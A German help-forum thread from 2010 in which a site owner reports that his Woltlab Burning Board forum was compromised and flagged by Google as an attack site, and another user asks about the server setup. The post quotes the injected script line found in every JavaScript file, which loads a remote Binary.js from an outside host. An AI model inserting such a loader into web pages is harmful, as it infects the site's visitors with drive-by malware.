Trojaner-Board

Trojaner-Board (https://www.trojaner-board.de/)
-   Plagegeister aller Art und deren Bekämpfung (https://www.trojaner-board.de/plagegeister-aller-art-deren-bekaempfung/)
-   -   JavaScript Hack auf Website - diretctrishta (https://www.trojaner-board.de/91920-javascript-hack-website-diretctrishta.html)

nzerox 17.10.2010 09:26

JavaScript Hack auf Website - diretctrishta
 
Hiho

hoffe ich kann mein Problem hier posten da es sich ja nicht um einen Trojaner im eigentlichen Sinne handelt sondern, wie schon im Betreff geschrieben, um einen Hack meiner Homepage bzw. des Forums.

Ich habe seit einigen Tagen gemerkt, dass beim Forum aufruf eine mir unbekannte Seite aufgerufen werden wollte.
Dadurch kam es auch Zeitweise zu sehr langen Ladezeiten des Forums.
Ich habe mir aber nichts weiter dabei gedacht weiil ich auch bei Google nichts Hilfreiches finden konnte, ausser das das irgendein JavaScrpt unpacker sein soll.

Mitlerweile gibt es einen Eintrag wo jemand von einem Hack spricht und demnach bin ich nun auch darauf gekommen, dass es ein Hack sein muss.
Gerade weil auch seit heute die Seite von Google gesperrt wurde:
"Als attackierend gemeldete Webseite!

Die Webseite auf w*w.erkelenzer06.de/board/ wurde als attackierende Seite gemeldet und auf Grund Ihrer Sicherheitseinstellungen blockiert

Attackierende Webseiten versuchen, Programme zu installieren, die private Informationen stehlen, Ihren Computer verwenden, um andere zu attackieren oder Ihr System beschädigen.

Manche Webseiten vertreiben bewusst Viren und ähnlich schädliche Software, aber viele Webseiten sind auch ohne das Wissen oder die Erlaubnis des Betreibers kompromittiert."

Ich habe auch schon gerausgefunden, dass nun in jeder JavaScript Datei folgender String angefügt wurde:
Code:

document.write('<sc'+'ript type="text/javascript" src="hxxp://addle.diretctrishta.com:8080/Binary.js"></scri'+'pt>');
Daraufhin habe ich aus jeder JS Datei diesen String raus gelöscht nur besteht das Problem weiterhin.
Hat jemand eine Ahnung woher dieser Kram kommt und wie man diesen entfernen kann?

Daten:
URL - h**p://www.erkelenzer06.de/board
Forum - Woltlab Burning Board 3.1.2

cosinus 18.10.2010 09:51

Zitat:

Hat jemand eine Ahnung woher dieser Kram kommt und wie man diesen entfernen kann?
Um sicher zu gehen, musst Du wahrscheinlich die Seite neu aufsetzen.
Erzähl mal was über den Server. Wie siehts aus mit

- Betriebssystem und Patchlevel
- Webserver, welche Version
- PHP? MySQL?
- Forumsoftware auf dem aktuellsten Stand? Alte Boardsoftware mit Sicherheitslücken wird schnell angegriffen...
- wie genau hast Du die Seite bzw. den Server im Griff?


Alle Zeitangaben in WEZ +1. Es ist jetzt 21:42 Uhr.

Copyright ©2000-2025, Trojaner-Board


Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131